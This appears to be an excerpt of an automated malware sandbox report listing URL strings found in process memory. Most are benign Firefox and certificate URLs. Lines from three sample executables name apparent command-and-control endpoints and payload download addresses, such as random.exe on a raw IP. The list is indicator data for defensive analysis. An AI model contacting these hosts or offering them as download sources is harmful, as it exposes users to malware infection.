Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/
Source: 76251a0626.exe, 00000014.00000002.1561942883.0000000001839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/6
Source: 76251a0626.exe, 00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/V
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/al
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001144000.00000004.00000020.00020000.00000000.sdmp, 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php$S
Source: 76251a0626.exe, 00000014.00000002.1561942883.0000000001826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php7
Source: 76251a0626.exe, 00000014.00000002.1561942883.0000000001826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php;
Source: 76251a0626.exe, 00000014.00000002.1561942883.0000000001826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpC
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpDS
Source: 76251a0626.exe, 00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpH4
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phplS
Source: 76251a0626.exe, 00000014.00000002.1561942883.0000000001826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpo
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpxS
Source: 76251a0626.exe, 00000014.00000002.1561942883.0000000001839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/en-GB
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/jG
Source: 76251a0626.exe, 00000014.00000002.1561942883.0000000001839000.00000004.00000020.00020000.00000000.sdmp, 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001117000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/ws
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100=
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/1.244.11/
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.php
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.php$f
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.php05
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.php056b
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.php1
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.php15;
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.php15e6
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.php9
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpF
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpJi
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpNf
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpPf
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpY
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpZi
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpZn
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpe
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpji
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phprosoft
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phps
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.10/Dem7kTu/index.phpzn
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, svoutse.exe, 0000000F.00000002.3716587854.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/steam/random.exe
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/steam/random.exe506238476W
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/steam/random.exeY
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/steam/random.exee
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/well/random.exe
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/well/random.exevE
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1968357533.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967714144.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: firefox.exe, 00000019.00000003.1966895160.000001EBF1412000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972043932.000001EBF13E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: firefox.exe, 00000019.00000003.1968832824.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972439281.000001EBF140C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1975654553.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972224946.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967758085.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972043932.000001EBF13F2000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 00000019.00000003.1966895160.000001EBF1412000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967758085.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: firefox.exe, 00000019.00000003.1972043932.000001EBF13E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1926066661.000001EBFDEAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: firefox.exe, 00000019.00000003.1966895160.000001EBF1412000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972043932.000001EBF13E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1968357533.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967714144.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: firefox.exe, 00000019.00000003.1966895160.000001EBF1412000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967758085.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: firefox.exe, 00000019.00000003.1972043932.000001EBF13E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 00000019.00000003.1968832824.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972439281.000001EBF140C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1975654553.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972224946.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967758085.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972043932.000001EBF13F2000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1968357533.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967714144.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: firefox.exe, 00000019.00000003.1968832824.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972439281.000001EBF140C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1975654553.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972224946.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967758085.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972043932.000001EBF13F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: firefox.exe, 00000019.00000003.1658305985.000001EBF262A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000019.00000003.1734012663.000001EBF2434000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000019.00000003.1724435869.000001EBF5AD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2089243662.000001EBFEA6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000019.00000003.1658305985.000001EBF262A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000019.00000003.1658305985.000001EBF262A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000019.00000003.1738162351.000001EBED481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000019.00000003.1738162351.000001EBED481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions0
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-04/schema#http://json-schema.org/draft-06/schema#http://json-schema.org
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/boolean
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureIdhttp:/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/appId
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
